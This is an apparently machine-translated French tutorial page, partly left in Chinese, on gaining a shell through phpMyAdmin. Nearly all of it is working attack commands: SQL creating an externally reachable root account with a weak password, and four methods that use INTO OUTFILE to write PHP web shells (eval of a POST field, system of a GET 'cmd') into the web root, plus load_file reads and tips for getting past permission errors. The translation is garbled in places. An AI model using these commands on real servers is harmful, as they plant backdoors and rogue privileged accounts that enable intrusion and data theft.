Maison > Article > base de données > Résumé PHPmyadmin prend le shell
Ce qui suit est résumé par la colonne tutoriel phpmyadmin phpmyadminObtenez le shell, j'espère qu'il sera utile à vos amis. dans le besoin !
PHPmyadmin prend le résumé du shell
PHPmyadmin change le mot de passe utilisateur
Cliquez directement sur localhost ou 1270.0.1 ci-dessus, la colonne utilisateur apparaîtra, cliquez pour modifier
Ajouter le mot de passe du super utilisateur deviner ooxx et autoriser les connexions externes
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
Nous pouvons créer un compte root et définir un mot de passe
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
De cette façon, nous créons un compte de lien externe root avec un mot de passe de 123456. Utilisez 123456 pour les liens externes
Quatre façons classiques de utiliser Shell :
Première méthode :
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on
Méthode deux :
读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话: select '<?php @eval_r($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php' cmd执行权限: select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Troisième méthode :
La version JhackJ de PHPmyadmin prend le shell
Create TABLE study (cmd text NOT NULL); Insert INTO study (cmd) VALUES('<?php eval_r($_POST[cmd])?>'); select cmd from study into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS study; <?php eval_r($_POST[cmd])?> -------------------------------------------------------------------------------- <?php @eval_r($_POST[cmd])?> CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 INSERT INTO study( cmd ) VALUES ('<?php eval_r($_POST[cmd])?>');# 影响列数: 1 SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1 DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
Méthode 4 :
select load_file('E:/xamp/www/study.php'); select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Visitez ensuite l'annuaire du site Web : http://www.2cto.com/ study.php?cmd=dir
Lorsque Phpmyadmin exporte une phrase (Errcode : 13 - Autorisation refusée)
n'a pas l'autorisation pour ce répertoire. Vous pouvez essayer le. répertoire de niveau supérieur ou répertoire de niveau inférieur
Si cela ne fonctionne pas, essayez NTS pour le trafic
Faites également attention au répertoire
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!